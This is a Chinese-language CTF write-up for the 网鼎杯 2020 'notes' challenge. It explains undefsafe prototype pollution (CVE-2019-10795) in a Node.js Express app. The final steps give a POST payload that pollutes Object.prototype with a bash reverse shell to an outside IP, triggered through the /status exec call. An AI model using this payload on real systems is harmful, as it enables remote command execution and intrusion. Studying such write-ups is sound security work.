undefsafe原型链[网鼎杯 2020 青龙组]notes

原型链[网鼎杯 2020 青龙组]notes"/>

undefsafe原型链[网鼎杯 2020 青龙组]notes

感觉是考原型链但还是有点不知道如何下手，呜呜呜呜呜呜。
从浅入深 Javascript 原型链与原型链污染
[网鼎杯 2020 青龙组]notes

var express = require('express');
var path = require('path');
const undefsafe = require('undefsafe');
const { exec } = require('child_process');var app = express();
class Notes {constructor() {this.owner = "whoknows";this.num = 0;this.note_list = {};}write_note(author, raw_note) {this.note_list[(this.num++).toString()] = {"author": author,"raw_note":raw_note};}get_note(id) {var r = {}undefsafe(r, id, undefsafe(this.note_list, id));return r;}edit_note(id, author, raw) {undefsafe(this.note_list, id + '.author', author);undefsafe(this.note_list, id + '.raw_note', raw);}get_all_notes() {return this.note_list;}remove_note(id) {delete this.note_list[id];}
}var notes = new Notes();
notes.write_note("nobody", "this is nobody's first note");app.set('views', path.join(__dirname, 'views'));
app.set('view engine', 'pug');app.use(express.json());
app.use(express.urlencoded({ extended: false }));
app.use(express.static(path.join(__dirname, 'public')));app.get('/', function(req, res, next) {res.render('index', { title: 'Notebook' });
});app.route('/add_note').get(function(req, res) {res.render('mess', {message: 'please use POST to add a note'});}).post(function(req, res) {let author = req.body.author;let raw = req.body.raw;if (author && raw) {notes.write_note(author, raw);res.render('mess', {message: "add note sucess"});} else {res.render('mess', {message: "did not add note"});}})app.route('/edit_note').get(function(req, res) {res.render('mess', {message: "please use POST to edit a note"});}).post(function(req, res) {let id = req.body.id;let author = req.body.author;let enote = req.body.raw;if (id && author && enote) {notes.edit_note(id, author, enote);res.render('mess', {message: "edit note sucess"});} else {res.render('mess', {message: "edit note failed"});}})app.route('/delete_note').get(function(req, res) {res.render('mess', {message: "please use POST to delete a note"});}).post(function(req, res) {let id = req.body.id;if (id) {notes.remove_note(id);res.render('mess', {message: "delete done"});} else {res.render('mess', {message: "delete failed"});}})app.route('/notes').get(function(req, res) {let q = req.query.q;let a_note;if (typeof(q) === "undefined") {a_note = notes.get_all_notes();} else {a_note = notes.get_note(q);}res.render('note', {list: a_note});})app.route('/status').get(function(req, res) {let commands = {"script-1": "uptime","script-2": "free -m"};for (let index in commands) {exec(commands[index], {shell:'/bin/bash'}, (err, stdout, stderr) => {if (err) {return;}console.log(`stdout: ${stdout}`);});}res.send('OK');res.end();})app.use(function(req, res, next) {res.status(404).send('Sorry cant find that!');
});app.use(function(err, req, res, next) {console.error(err.stack);res.status(500).send('Something broke!');
});const port = 8080;
app.listen(port, () => console.log(`Example app listening at http://localhost:${port}`))

Undefsafe 模块原型链污染（CVE-2019-10795）
不光是 Merge 操作容易造成原型链污染，undefsafe 模块也可以原型链污染。undefsafe 是 Nodejs 的一个第三方模块，其核心为一个简单的函数，用来处理访问对象属性不存在时的报错问题。但其在低版本（< 2.0.3）中存在原型链污染漏洞，攻击者可利用该漏洞添加或修改 Object.prototype 属性。



在edit_note种我们可以控制，id和author。id可以__proto__污染原型链，author设置值


然后还有一些细节
Notes.note_list和commands都是赋予对象的值，原型链都是object，所有只需要__proto__向原型返回一次，然后为啥可以调用到我们用原型链污染的值

for…in 循环只遍历可枚举属性（包括它的原型链上的可枚举属性）。像 Array和 Object使用内置构造函数所创建的对象都会继承自Object.prototype和String.prototype的不可枚举属性，例如 String 的 indexOf() 方法或 Object的toString()方法。循环将遍历对象本身的所有可枚举属性，以及对象从其构造函数原型中继承的属性（更接近原型链中对象的属性覆盖原型属性）

最后exec执行命令，exec是require引入了child_process这个文件

赋予的意思是exec=require(‘child_process’).exec;

child_process.exec(command[, options][, callback]) 启动
子进程来执行shell命令,可以通过回调参数来获取脚本shell执行结果

都搞明白了，来开始做题
/edit_note目录下传
post

id=__proto__&author=bash+-i+%3e%26+%2fdev%2ftcp%2f47.93.248.44%2f7777+0%3e%261&raw=jj

payload要url加密一下有&
然后访问/status触发，vpn监听就行